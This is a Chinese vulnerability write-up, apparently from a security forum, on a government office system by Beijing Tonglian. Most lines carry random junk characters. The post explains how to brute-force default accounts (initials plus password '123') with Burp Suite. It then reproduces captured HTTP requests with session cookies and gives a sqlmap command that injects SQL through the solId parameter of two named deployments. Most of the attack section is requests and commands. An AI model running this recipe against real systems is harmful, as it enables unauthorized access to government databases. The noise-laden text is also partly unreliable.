|
) m/ Y) r/ `( k
% h0 h, t6 ^: w; M( D " `3 A( T8 ]% q3 j
5 u& v& p2 J% J& ~- O
平台简介:
* D- Z* \: l4 r& c- T 4 R2 @/ d, W( D. I P+ s
8 Z0 S' u% K4 ^) ?4 |& j ~) X8 `
7 \. N p- E+ l+ Y# H
% M' o+ g6 ]$ @/ I
# ~( m' L- \' K" c 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 $ \7 v7 S' ^7 ^, @
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 1 l$ A) U9 R' ]3 p" d D% S
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
3 a. J; D6 H# x. v1 A' N& |' Q & a0 v1 z4 j, N
$ p1 k. x, Z. Y8 s: @& S: k: u" I
. Z# ?- }. d: `
, n/ [+ k% N" ^% L* I
3 e* h6 a- D2 l8 G 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
/ ?# o" s0 o: J- Z) @ 4 O" h3 R- Z3 K4 y- v3 `' \
* m* m* y5 V% l* f$ o' T5 y$ ] 1 |/ I0 m3 N' b4 z* r* }5 Y6 ?
- V* K# u( z3 p Q3 z/ ~
- O0 ^+ ~1 q* F, X+ G
http://1.1.1.1:7197/cap-aco/#(案例2-) S; h6 Y- [: a+ l! s
3 ~+ ~1 G0 H! T1 {' u- E( E' q
" Y+ J: Z( |% f' U( C' K http://www.XXOO.com (案例1-官网网站): v0 D" x8 @+ I! G- p* x1 X: r% V
4 L, }, j& q6 s0 m, H
5 q. {) r% f9 q3 }* O
6 J3 I* Q! q2 e/ d6 b% l % }- ~5 D; w X8 V5 Q
6 ~, V7 q, W( d) J* B$ E
漏洞详情:
: E$ q3 E: C. j+ ?
" m* t/ C. W% D2 ~* j4 ^. O; m1 O& ~/ c9 ^: h
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
! Y* N* u4 J9 N4 k. `
" A: k- ]0 m# c" M+ d
5 _9 {7 x, D5 O% j% P' o 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
& u( k* u! C' K0 z1 v2 \! `0 P ' C r* _: S# m+ A4 f* G
$ X( a/ |7 J. ?: F8 J1 P: R+ c
( \/ q' s p4 g% S7 h
5 K; r5 I+ M8 R4 ]3 N( N! i
8 ]/ E2 k7 ?" C
* y4 m+ h' V5 @/ f2 L
5 r- C7 ~3 k- y5 W+ G z. F9 [ P# Z* {( b5 j2 s6 p
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:/ r2 j4 ?! ]. G! g
8 j1 f7 v8 X' ?9 s$ j
+ P$ T# K4 w* G0 ]& t" I1 o
1、案例1-官方网站; O o! C) T" u: N) L% b
9 y# \/ J. I1 u$ z# l. k9 p
" R" d+ l! A2 _ a
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
U5 I0 d( R8 X" a- G+ g. w, j ) o# X" E0 l. F% V
( D2 S+ ^' w6 a0 d* ~- j- l
Host: www.XXOO.com
6 V9 w# S# @4 R! ~
: o1 u) m* f; z1 T$ a' V
" a0 N2 o4 P$ z* s Proxy-Connection: Keep-Alive- I0 N ~7 @' K: @. y0 o
) _# v3 ]% P8 W+ O5 c
1 ]" g! n! D' B8 | Accept: application/json, text/javascript, */*; q=0.01
( z M' _) d( W& K, e, g " d/ l! i1 \) F
0 Q) u" Q; g2 f Accept-Language: zh-CN
' P( L# ]' s7 `. o6 l
$ F6 p+ S6 B# M+ r8 o0 G; b8 `% K' A" y( @
Content-Type: application/json
$ w. a7 [2 p* L) \ 2 K' @. P k7 a% P9 C- o
9 q" H0 m, s8 ~$ h8 M" t2 Y% R
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko- T1 i) {0 c2 W. t0 M: p
: v# Y* x- t4 G6 T$ a7 M# I
: T6 \' m7 h; J! y2 M: _ X-Requested-With: XMLHttpRequest
2 T1 N: i8 @) N/ f1 T6 y6 W1 C, o. ? 8 |3 l& o! w- p9 C
1 @/ i1 H( ^8 {3 k. f$ U
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
z! f9 r8 Y3 c4 N/ Z2 }1 ~6 o
, e& D3 z$ a) I: x
: s5 a/ n- w/ x7 o Accept-Encoding: gzip, deflate, sdch \0 `& q( G4 W- a( T
: o1 d$ s/ E9 u) ?5 W
# w' }( [$ u* W# d
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
' \) f# S6 r2 ~1 n
N! P1 f5 J3 S( H' D1 a* P. |! s. z3 Z$ n' d& B
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
& c" S: v. p- ]1 e1 x0 R
5 s, n2 m" t# h9 `+ R" k
" z) i% Y% }$ M; \6 C
1 m8 m3 A% Z" O8 k+ L. u
! h8 |' p T. L" [3 b) j7 }7 C7 U; ]0 V$ v5 R
9 H1 a' c5 \- T' {) I9 Q; ?) H# e 6 d- y3 u9 b9 E& i z9 I* t
4 S- F- K1 E# J5 Z9 c8 b3 F5 `
6 E+ |7 t/ W$ O, n' r8 w3 j
?, s1 z, J: b4 B3 U
2 \( C# f _2 n/ n. ]
5 f' N, }% n- N: E2 Y
1 v& D8 K: z: G$ ^7 ~0 t
5 O( }$ I" o z7 C3 B8 v# c& p6 H
' U( |4 |' M. R . q; @; p0 r6 J' a T+ {4 d
/ P8 j+ ?% s; ]; ]+ @
2、案例2-某天河云平台
! M8 K2 v; h k& h, t2 l1 T
. v* E O/ f6 B( E. v9 u$ B
% m- V* z: r( j) i GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
$ S( L5 q; \+ T2 _4 M w$ i+ f
0 x1 |2 c, F( l, b3 |/ N: J) ]
- k; B: |1 f5 p3 y3 L Host: 1.1.1.:7197/ }; c( w& W1 i8 ^
1 J$ }% u- {" Q- I
! M# b4 ~0 Q: D$ Y Accept: application/json, text/javascript, */*; q=0.01
7 R0 i% A$ v" N$ r3 G % D! i8 G9 F7 d9 ^) W$ y1 V
) q" Q0 P# V5 e
X-Requested-With: XMLHttpRequest" z6 l1 h" b+ P
; w! J0 [5 G# `7 O( c! F+ G5 ]2 @2 Y. V) M
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0& L: E" h- x1 t9 G. B
: T) P( L: S/ N% y3 V
( C- i$ g2 P. k( e) s# }) ~ Content-Type: application/json
9 q j2 y# f q3 u) p4 w
& F8 C8 y& j) Y5 Q# T* {! U1 i! R7 Q% l& ~
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
# w; U5 x$ H' F3 j) {' H- r+ p+ F9 N+ W 8 L Z$ d, J2 o+ S; t
9 {+ }# `) @5 y1 K& h
Accept-Language: zh-CN,zh;q=0.8
4 N# g5 d9 a/ }/ f/ g* ^ ' {) [5 F) F1 t/ o4 D" c
' v4 Z }* T, p/ u: }
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1% [1 K/ w2 o6 o% m- l
3 g% v, j/ @' N7 P
: R R9 `: P$ {, x9 ^
Connection: close% v3 d9 M* y5 u* l: O6 c
6 x9 [' K- [. ~7 \' U5 \! X
5 X: r. W; L8 K6 F* H, u; T 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:/ a Z ?8 ~7 x2 n1 P4 W: I
* `% Y# L$ M" C# ~* C, @
! s- s) P$ h n5 F9 Q" \, e# h# \
% e7 u4 j! h. e
' S5 v n: b5 c) Z- O' a2 s" p% X/ C( I! Z0 @8 {: T
& }' T+ \% A$ s* o. I
|